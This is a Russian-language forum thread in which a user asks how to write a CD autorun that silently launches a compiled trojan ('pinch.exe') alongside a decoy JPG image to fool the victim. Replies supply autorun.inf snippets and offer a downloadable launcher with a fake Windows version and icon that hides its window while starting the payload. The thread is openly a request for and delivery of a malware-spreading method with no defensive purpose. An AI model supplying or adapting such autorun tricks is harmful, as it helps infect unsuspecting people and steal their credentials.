Всем привет Парни помогите плиз. Юзал поиск и ненашел но точно помню что почтишто такой вопрос уже гдето был тока там рассматривали ФЛЕШКУ <--- ей я необладаю а вот CD это да =) Я хотел у вас узнать . . . Все прекрасно знают что такое АВТОРУН для CD-ROM-ов так вот прошу помогите мне написать АВТОРУН для CD на этом CD есть скомпиленый троян который необходимо впарить (Парни если можно плиз напишите как сделать так чтобы из АВТОРУНА сразу запускался троян и *.jpg для отвода глаз) Помогите плиз что именно там необходимо написать
а так можно чтобы сразу 2-а вайла загрузились ? для отвода глаз или это будет какнибудь подругому выглядеть? Code: [AutoRun] open=pinch.exe open=FOTO.jpg <--- а так можно
[AutoRun] open=iexplore.exe flash.swf icon=file.ico or [AutoRun] open=flash.exe icon=file.ico хотя вот, набросал тебе небольшой нормальный авторун(имеет поддельную версию и иконку от винды, небольшей размер(34 кб)): при запуске диска, он читает названия двух программ из файла cinfi.inf и после их запускает, далее она сама закрывается, не появляется форма и не выскакивает форма в панели задач... вообщем-то всё. Вложил ту иконку в архив. Кароче, если появится желание запустить программы с компа жертвы, то меня просто pinch.exe ->> c:\pinch.exe, вообщем всё. //скачать
спс большое СПС за помошь snak3 а че это за файл за такой snak3.exe в твоем архиве? Чет чует мой зад что енто троян? аль нет?
да нет))) это и есть авторан сам)) переминуй его хоть в васяпупкин exe, но в авторане укажи соответствующене)